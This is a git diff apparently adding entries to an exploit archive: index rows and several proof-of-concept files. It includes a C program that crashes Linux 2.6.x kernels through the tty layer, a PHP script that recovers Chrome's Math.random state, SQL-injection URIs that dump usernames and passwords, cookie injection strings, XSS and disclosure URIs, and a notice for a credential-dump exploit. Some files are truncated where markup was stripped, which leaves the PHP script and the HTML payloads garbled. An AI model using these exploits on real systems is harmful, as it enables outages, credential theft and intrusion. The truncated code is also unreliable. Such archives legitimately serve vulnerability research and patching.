diff --git a/files.csv b/files.csv index 447d1b926..d8376ce86 100755 --- a/files.csv +++ b/files.csv @@ -29912,3 +29912,17 @@ id,file,description,date,author,platform,type,port 33176,platforms/linux/dos/33176.rb,"ntop 3.3.10 HTTP Basic Authentication NULL Pointer Dereference Denial Of Service Vulnerability",2009-08-18,"Brad Antoniewicz",linux,dos,0 33177,platforms/hardware/remote/33177.txt,"NetGear WNR2000 Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote,0 33178,platforms/php/webapps/33178.txt,"Computer Associates SiteMinder '%00' Cross Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",php,webapps,0 +33180,platforms/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x 'index.template.html' Cross Site Scripting Vulnerability",2009-08-19,"Adam Bixby",multiple,webapps,0 +33181,platforms/java/webapps/33181.txt,"Computer Associates SiteMinder Unicode Cross Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",java,webapps,0 +33183,platforms/novell/dos/33183.html,"Novell Client 4.91.5 ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service Vulnerability (1)",2009-08-25,"Francis Provencher",novell,dos,0 +33184,platforms/novell/dos/33184.html,"Novell Client 4.91.5 ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service Vulnerability (2)",2009-08-25,"Francis Provencher",novell,dos,0 +33185,platforms/windows/dos/33185.html,"Nokia Lotus Notes Connector 'lnresobject.dll' Unspecified Remote Denial of Service Vulnerability",2009-08-25,"Francis Provencher",windows,dos,0 +33186,platforms/php/webapps/33186.txt,"VideoGirls forum.php t Parameter XSS",2009-08-26,Moudi,php,webapps,0 +33187,platforms/php/webapps/33187.txt,"VideoGirls profile.php profile_name Parameter XSS",2009-08-26,Moudi,php,webapps,0 +33188,platforms/php/webapps/33188.txt,"VideoGirls view.php p Parameter XSS",2009-08-26,Moudi,php,webapps,0 +33189,platforms/php/webapps/33189.txt,"PHP-Fusion 6.1.18 Multiple Information Disclosure Vulnerabilities",2009-08-26,Inj3ct0r,php,webapps,0 +33190,platforms/php/webapps/33190.txt,"OpenAutoClassifieds <= 1.5.9 SQL Injection Vulnerabilities",2009-08-25,"Andrew Horton",php,webapps,0 +33191,platforms/php/webapps/33191.txt,"FlexCMS 2.5 'CookieUsername' Cookie Parameter SQL Injection Vulnerability",2009-08-28,Inj3ct0r,php,webapps,0 +33192,platforms/multiple/remote/33192.php,"Google Chrome <= 6.0.472 'Math.Random()' Random Number Generation Vulnerability",2009-08-31,"Amit Klein",multiple,remote,0 +33193,platforms/linux/dos/33193.c,"Linux Kernel 2.6.x 'drivers/char/tty_ldisc.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-19,"Eric W. Biederman",linux,dos,0 +33195,platforms/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 - Remote User Credential Dump",2014-05-05,bhamb,php,webapps,0 diff --git a/platforms/java/webapps/33181.txt b/platforms/java/webapps/33181.txt new file mode 100755 index 000000000..844fb1062 --- /dev/null +++ b/platforms/java/webapps/33181.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36088/info + +Computer Associates SiteMinder is prone to a security-bypass vulnerability because it fails to properly validate user-supplied input. + +An attacker can exploit this issue to bypass cross-site scripting protections. Successful exploits can aid in further attacks. + +We don't know which versions of SiteMinder are affected. We will update this BID when more details become available. + +http://www.example.com/app/function?foo=bar%e0%80%bc diff --git a/platforms/linux/dos/33193.c b/platforms/linux/dos/33193.c new file mode 100755 index 000000000..f2f06580c --- /dev/null +++ b/platforms/linux/dos/33193.c @@ -0,0 +1,260 @@ +source: http://www.securityfocus.com/bid/36191/info + +The Linux kernel is prone to a local denial-of-service vulnerability. + +Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed. + +This issue was introduced in Linux kernel 2.6.26 and fixed in 2.6.31-rc8. + +/* gcc -o KernelTtyTest KernelTtyTest.c -Wall -O2 -lutil */ +#define _GNU_SOURCE 1 +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define POLL_TIMEOUT (10*1000) /* in milliseconds */ +#define LASTBUFSZ 10000 +#define CMDBUFSZ 10000 +#define SIGINT_LONGJMP 0 +#define SIGINT_VAR 1 +static void putstr(char *str, FILE *out) +{ + int c; + for (c = *str++; c; c = *str++) { + if (iscntrl(c)) { + putc('\\', out); + switch(c) { + case '\n': putc('n', out); break; + case '\r': putc('r', out); break; + default: printf("%03o", c); break; + } + } else { + putc(c, out); + } + } +} +static void print_lastbytes(char *lastbytes, size_t totalbytes, FILE *out) +{ + char *start = lastbytes; + if (totalbytes < LASTBUFSZ) + start = &lastbytes[LASTBUFSZ - totalbytes]; + fprintf(out, "lastbytes: '"); + putstr(start, out); + fprintf(out, "'"); +} +static void expect(int masterfd, char *str, size_t len) +{ + char lastbytes[LASTBUFSZ + 1]; + size_t totalbytes = 0; + memset(lastbytes, sizeof(lastbytes), 0); + + for (;;) { + char buf[1]; + ssize_t bytes; + int ret; + struct pollfd fds = { + .fd = masterfd, + .events = POLLIN | POLLERR | POLLHUP, + .revents = 0, + }; + ret = poll(&fds, 1, POLL_TIMEOUT); + if (ret == 0) { + fprintf(stderr, "Timeout while waiting for '"); + putstr(str, stderr); + fprintf(stderr, "' "); + print_lastbytes(lastbytes, totalbytes, stderr); + fprintf(stderr,"\n"); + exit(5); + } + else if (ret < 0) { + fprintf(stderr, "poll failed: %s\n", strerror(errno)); + exit(4); + } + bytes = read(masterfd, buf, 1); + if (bytes == 1) { + totalbytes++; + memmove(lastbytes, lastbytes +1, LASTBUFSZ); + lastbytes[LASTBUFSZ - 1] = buf[0]; + lastbytes[LASTBUFSZ] = '\0'; + if (memcmp(&lastbytes[LASTBUFSZ - len], str, len) == 0) + return; + } + else if (bytes < 0) { + fprintf(stderr, "read failed: %s\n", + strerror(errno)); + print_lastbytes(lastbytes, totalbytes, stderr); + fprintf(stderr,"\n"); + abort(); + exit(3); + } + } +} +static void resync(int masterfd) +{ + static unsigned count; + char cookie[100]; + char cmd[1000]; + char reply[1000]; + ssize_t written, bytes; + snprintf(cookie, sizeof(cookie), "_%u_", ++count); + bytes = snprintf(cmd, sizeof(cmd), "echo %s\n", cookie); + written = 0; + while (bytes) { + ssize_t sent; + sent = write(masterfd, cmd + written, bytes); + if (sent >= 0) { + written += sent; + bytes -= sent; + } else if ((errno != EAGAIN) && (errno != EINTR)) { + fprintf(stderr, "Write to child failed: %s\n", strerror(errno)); + exit(2); + } + } + snprintf(reply, sizeof(reply), "\n%s", cookie); + expect(masterfd, reply, strlen(reply)); +} +#if SIGINT_VAR +static volatile sig_atomic_t saw_sigint; +#endif + +static void process_cmd(void) +{ + char cmdbuf[CMDBUFSZ]; + size_t cmdlen; + char buf[1]; + cmdlen = 0; + for (;;) { + ssize_t bytes; +#if SIGINT_VAR + if (saw_sigint) { + saw_sigint = 0; + printf("^C\n"); + fflush(stdout); + return; + } +#endif + bytes = read(STDIN_FILENO, buf, 1); + if (bytes == 1) { + cmdbuf[cmdlen] = '\0'; + putchar(buf[0]); + fflush(stdout); + if (buf[0] == '\n') { + if (cmdlen == 0) { + printf("> "); + fflush(stdout); + } + else if (memcmp("echo ", cmdbuf, 5) == 0) { + printf("%s\n", cmdbuf + 5); + fflush(stdout); + return; + } else { + fprintf(stdout, "unknown cmd: '"); + putstr(cmdbuf, stdout); + printf("'\n"); + fflush(stdout); + return; + } + } + cmdlen += 1; + if (cmdlen >= CMDBUFSZ) { + fprintf(stderr, "command too long!\n"); + _exit(3); + } + cmdbuf[cmdlen - 1] = buf[0]; + cmdbuf[cmdlen] = '\0'; + } + if (bytes == 0) { + /* EOF terminate */ + _exit(0); + } + if (bytes < 0) { + fprintf(stderr, "%s read failed: %s\n", + __func__, strerror(errno)); + _exit(4); + } + } +} +#if SIGINT_LONGJMP +static sigjmp_buf sigint_dest; +#endif +static void sigint_handler(int signum) +{ +#if SIGINT_LONGJMP + siglongjmp(sigint_dest, 1); +#endif +#if SIGINT_VAR + saw_sigint = 1; +#endif +} +static void process_cmds(void) +{ + sigset_t signal_set; +#if 1 + struct sigaction act; +#endif + sigemptyset( &signal_set); + sigaddset( &signal_set, SIGINT); + + /* Block sigint until I reinstall the handler */ + sigprocmask(SIG_BLOCK, &signal_set, NULL); +#if 0 + signal(SIGINT, sigint_handler); +#else + memset(&act, sizeof(act), 0); + act.sa_handler = &sigint_handler; + act.sa_flags = SA_NODEFER; + sigaction(SIGINT, &act, NULL); +#endif +#if SIGINT_LONGJMP + if (sigsetjmp(sigint_dest, 1)) { + printf("^C\n"); + fflush(stdout); + } +#endif + sigprocmask(SIG_UNBLOCK, &signal_set, NULL); + for (;;) + process_cmd(); +} +int main(int argc, char *argv[], char *environ[]) +{ + pid_t pid; + int masterfd; + struct winsize terminal_size; + int i; + terminal_size.ws_row = 80; + terminal_size.ws_col = 25; + terminal_size.ws_xpixel = 0; + terminal_size.ws_ypixel = 0; + + pid = forkpty(&masterfd, NULL, NULL, &terminal_size); + if (pid == 0) { /* child */ + char *args[] = { "/bin/sh", NULL }; + char *env[] = { NULL }; +#if 0 + execve("/bin/bash", args, env); +#endif +#if 1 + process_cmds(); +#endif + _exit(1); + } + resync(masterfd); +#if 1 + for (i = 0; i < 10; i++) { + usleep(100); + kill(pid, SIGINT); + } +#endif +#if 0 + usleep(1000); +#endif + resync(masterfd); + return 0; +} diff --git a/platforms/multiple/remote/33192.php b/platforms/multiple/remote/33192.php new file mode 100755 index 000000000..356a427ee --- /dev/null +++ b/platforms/multiple/remote/33192.php @@ -0,0 +1,193 @@ +source: http://www.securityfocus.com/bid/36185/info + +Google Chrome is prone to security vulnerability that may allow the application to generate weak random numbers. + +Successfully exploiting this issue may allow attackers to obtain sensitive information or gain unauthorized access. + +Chrome 3.0 Beta is vulnerable; other versions may also be affected. + +> 16)|(($unk & 3)<<14); +$hi2low=($v2 >> 16)|(($unk>>2)<<14); +$hi1high=bcmod(bcsub(bcadd($two_32,$hi2low),bcmul(36969,$hi1low)),65536); +if ($hi1high>=36969) +{ +continue; +} +$hi1=bcadd(bcmul($hi1high,65536),$hi1low)+0; +$hi2=bcadd(bcmul(36969,($hi1 & 0xFFFF)),bcdiv($hi1,65536,0))+0; +$hi3=bcadd(bcmul(36969,($hi2 & 0xFFFF)),bcdiv($hi2,65536,0))+0; +$hi4=bcadd(bcmul(36969,($hi3 & 0xFFFF)),bcdiv($hi3,65536,0))+0; +if (($v1 == ((($hi1<<16)|($lo1 & 0xFFFF))&0x3FFFFFFF)) and +($v2 == ((($hi2<<16)|($lo2 & 0xFFFF))&0x3FFFFFFF)) and +Google Chrome v3.0 (Beta) Math.random vulnerability +10 +($v3 == ((($hi3<<16)|($lo3 & 0xFFFF))&0x3FFFFFFF)) and +($v4 == ((($hi4<<16)|($lo4 & 0xFFFF))&0x3FFFFFFF))) +{ +$found_state=true; +break; +} +} +if (!$found_state) +{ +echo "ERROR: cannot find PRNG state (is this really Chrome 3.0?) +
\n"; +exit; +} +echo "Math.random PRNG current state: hi=$hi4 lo=$lo4
\n"; +$lo5=bcadd(bcmul(18273,bcmod($lo4,65536)),bcdiv($lo4,65536,0)); +$hi5=bcadd(bcmul(36969,($hi4 & 0xFFFF)),bcdiv($hi4,65536,0))+0; +$v5=(($hi5<<16)|($lo5 & 0xFFFF))&0x3FFFFFFF; +echo "Math.random next value: +
\n"; +echo "
\n"; +echo "NOTE: Anything below this line is available only for Windows.
\n"; +echo "
\n"; +# Rollback +$lo=$lo1; +$hi=$hi1; +$found_initial_state=false; +for ($mileage=0;$mileage\n"; +echo "Math.random PRNG mileage: $mileage [Math.random() +invocations]
\n"; +$found_initial_state=true; +break; +} +} +if ($found_initial_state) +{ +echo "
"; +$first=$hi+0; +$second=$lo+0; +$cand=array(); +for ($v=0;$v<(1<<16);$v++) +{ +$state=($first<<16)|$v; +$state=adv($state); +if ((($state>>16)&0x7FFF)==$second) +{ +$state=prev_state(($first<<16)|$v); +$seed_time=bcadd(bcmul(bcdiv(bcmul($t,1000),$two_31,0),$two_31),$state); +if (bccomp($seed_time,bcmul($t,1000))==1) +{ +$seed_time=bcsub($seed_time,$two_31); +} +$cand[$seed_time]=$state; +} +} +Google Chrome v3.0 (Beta) Math.random vulnerability +11 +# reverse sort by seed_time key (string comparison - but since 2002, +second-since-Epoch are 10 digits exactly, so string comparison=numeric comparison) +krsort($cand); +echo count($cand)." candidate(s) for MSVCRT seed and seeding time, from +most likely to least likely:
\n"; +echo "\n"; +echo "\n"; +echo "\n"; +echo " \n"; +echo " "; +echo " \n"; +echo "\n"; +$cn=0; +foreach ($cand as $seed_time => $st) +{ +if ($cn==0) +{ +$pre=""; +$post=""; +} +else +{ +$pre=""; +$post=""; +} +echo "\n"; +echo " \n"; +echo " +\n"; +echo " \n"; +echo "\n"; +$cn++; +} +echo "
MSVCRT PRNG Seeding time [sec] MSVCRT PRNG Seeding time [UTC date] MSVCRT PRNG seed
".$pre.substr_replace($seed_time,".",- +3,0).$post."".$pre.gmdate("r",bcdiv($seed_time,1000)).$post."".$pre.$st.$post."
\n"; +echo "\n"; +echo "
\n"; +} +else +{ +echo "ERROR: Cannot find Math.random initial state (non-Windows +platform?)
\n"; +} +} +?> + + +
+ + + + + + +
+ +
+ +
\ No newline at end of file diff --git a/platforms/multiple/webapps/33180.txt b/platforms/multiple/webapps/33180.txt new file mode 100755 index 000000000..4dae9e912 --- /dev/null +++ b/platforms/multiple/webapps/33180.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36087/info + +Adobe Flex SDK is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input to express-install template files. + +An attacker could exploit this vulnerability to execute arbitrary script code in the context of a web application built using the SDK. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Versions prior to Flex SDK 3.4 are vulnerable. + +http://www.example.com/Flex/index.template.html?"/> \ No newline at end of file diff --git a/platforms/novell/dos/33183.html b/platforms/novell/dos/33183.html new file mode 100755 index 000000000..bd950f02a --- /dev/null +++ b/platforms/novell/dos/33183.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36139/info + +The Novell Client ActiveX control is prone to a remote denial-of-service vulnerability because of an unspecified error. + +A successful attack allows a remote attacker to crash an application that is using the ActiveX control (typically Internet Explorer), denying further service to legitimate users. + +Novell Client 4.91.5.1 is vulnerable; other versions may also be affected. + + \ No newline at end of file diff --git a/platforms/novell/dos/33184.html b/platforms/novell/dos/33184.html new file mode 100755 index 000000000..944e6d798 --- /dev/null +++ b/platforms/novell/dos/33184.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/36139/info + +The Novell Client ActiveX control is prone to a remote denial-of-service vulnerability because of an unspecified error. + +A successful attack allows a remote attacker to crash an application that is using the ActiveX control (typically Internet Explorer), denying further service to legitimate users. + +Novell Client 4.91.5.1 is vulnerable; other versions may also be affected. + + \ No newline at end of file diff --git a/platforms/php/webapps/33186.txt b/platforms/php/webapps/33186.txt new file mode 100755 index 000000000..075cbd240 --- /dev/null +++ b/platforms/php/webapps/33186.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/36168/info + +VideoGirls is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible. + +http://www.example.com/forum.php?ftid=2&t="> \ No newline at end of file diff --git a/platforms/php/webapps/33187.txt b/platforms/php/webapps/33187.txt new file mode 100755 index 000000000..f4a65d058 --- /dev/null +++ b/platforms/php/webapps/33187.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/36168/info + +VideoGirls is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible. + +http://www.example.com/profile.php?profile_name="> \ No newline at end of file diff --git a/platforms/php/webapps/33188.txt b/platforms/php/webapps/33188.txt new file mode 100755 index 000000000..700b47aa5 --- /dev/null +++ b/platforms/php/webapps/33188.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/36168/info + +VideoGirls is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible. + +http://www.example.com/view.php?p="> \ No newline at end of file diff --git a/platforms/php/webapps/33189.txt b/platforms/php/webapps/33189.txt new file mode 100755 index 000000000..fa3c24a49 --- /dev/null +++ b/platforms/php/webapps/33189.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/36171/info + +PHP-Fusion is prone to multiple information-disclosure vulnerabilities. + +Attackers can exploit these issues to harvest sensitive information that may lead to further attacks. + +The following example URIs are available: + +http://www.example.com/members.php?sortby[]=A +http://www.example.com/messages.php?folder[]=inbox \ No newline at end of file diff --git a/platforms/php/webapps/33190.txt b/platforms/php/webapps/33190.txt new file mode 100755 index 000000000..512ec5a84 --- /dev/null +++ b/platforms/php/webapps/33190.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/36173/info + +OpenAutoClassifieds is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Versions prior to OpenAutoClassifieds 1.6.0 are vulnerable. + +The following proof-of-concept URIs are available: + +http://www.example.com/openauto/xml_zone_data.php?filter=1%20union%20select%20concat(0x0a,user,0x3a,pass,0x3a,0x0a)%20from%20users + +http://www.example.com/openauto/listings.php?min-price=&max_price=&start_zip=BENCHMARK(1000000,MD5(1))&zip_range=10000&state=Illinois&submit=Search&vehicle_type=&make=&model=&year=&listing_condition=&trans=&drive_train=&sellerid= \ No newline at end of file diff --git a/platforms/php/webapps/33191.txt b/platforms/php/webapps/33191.txt new file mode 100755 index 000000000..9831dfd1c --- /dev/null +++ b/platforms/php/webapps/33191.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/36179/info + +FlexCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +FlexCMS 2.5 and prior versions are vulnerable. + +FCLoginData12345=qwerty'+and+1=1/*%3D%3DqwDyM1dbqwDyM1db9iOPI +FCLoginData12345=qwerty'+and+1=2/*%3D%3DqwDyM1dbqwDyM1db9iOPI + diff --git a/platforms/php/webapps/33195.txt b/platforms/php/webapps/33195.txt new file mode 100755 index 000000000..0adcb8d34 --- /dev/null +++ b/platforms/php/webapps/33195.txt @@ -0,0 +1,35 @@ +# Exploit Title: Team Helpdesk Customer Web Service (CWS) Remote User Credential Dump exploit +# Exploit Title: Team Helpdesk Technician Web Access (TWA) Remote User Credential Dump exploit +# Date: May 5, 2014 +# Exploit Author: bhamb (ccb3b72@gmail.com) +# Vendor Homepage: http://www.assistmyteam.net/TeamHelpdesk/ +# Software Link: http://www.assistmyteam.net/TeamHelpdesk/Download.asp +# Version: 8.3.5 (and probably prior) +# Tested on: Windows 2008 R2 +# CVE : - + +Recommendation: + +Usage: ./user_cred_dump_cws.py https://Hostname.com + +You will get a username:encrypted-password pairs. +To decrypt the encrypted passwords, please use my Password Decrypt script +(decrypt_cws.py) for Team Helpdesk CWS. + + + + +Usage: ./user_cred_dump_twa.py https://Hostname.com + +You will get a username:encrypted-password pairs. +To decrypt the encrypted passwords, please use my Password Decrypt script +(decrypt_twa.py) for Team Helpdesk TWA. + + + +Verifying exploits +https://www.youtube.com/watch?v=pJ1fGN3DIMU&feature=youtu.be + + + +Exploit-DB Mirror: http://www.exploit-db.com/sploits/33195-Team_Helpdesk_Web.zip \ No newline at end of file diff --git a/platforms/windows/dos/33185.html b/platforms/windows/dos/33185.html new file mode 100755 index 000000000..35ac72797 --- /dev/null +++ b/platforms/windows/dos/33185.html @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/36144/info + +The Nokia Lotus Notes Connector 'lnresobject.dll' ActiveX control is prone to a remote denial-of-service vulnerability because of an unspecified error. + +A successful attack allows a remote attacker to crash an application that is using the ActiveX control (typically Internet Explorer), denying further service to legitimate users. + + \ No newline at end of file